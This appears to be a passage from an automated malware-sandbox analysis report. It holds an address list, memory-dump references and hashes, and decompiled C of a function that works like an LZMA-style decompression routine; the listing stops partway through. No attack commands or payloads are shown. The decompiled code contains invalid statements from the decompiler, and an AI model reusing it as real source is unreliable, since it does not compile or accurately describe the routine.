                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406432
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645d
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406462
                        0x00406469
                        0x0040646c
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x004064cb
                        0x004064cb
                        0x004064ce
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x00000000
                        0x004068f7
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069bb
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x00000000
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00406609
                        0x0040660c
                        0x0040660f
                        0x00406611
                        0x00406613
                        0x00406613
                        0x00406614
                        0x00406617
                        0x0040661e
                        0x00406621
                        0x0040662f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406914
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00000000
                        0x00406a50
                        0x0040691e
                        0x00406921
                        0x00406924
                        0x00406928
                        0x0040692b
                        0x00406931
                        0x00406933
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00000000
                        0x00000000
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x004063b9
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x00406803
                        0x00406a38
                        0x00406a5a
                        0x00406a60
                        0x00406a62
                        0x00406a69
                        0x00406a6b
                        0x00406a72
                        0x00406a76
                        0x00000000
                        0x00406067
                        0x00406a6f
                        0x00406a6f
                        0x00000000
                        0x00406a6f
                        0x004068bc
                        0x00406942
                        0x00406948
                        0x0040694b
                        0x0040694e
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x00406982
                        0x00406985
                        0x00406989
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x0040696d
                        0x00406972
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406999
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x0040699b
                        0x00406999
                        0x00000000
                        0x0040680e

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                        • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                        • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                        • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
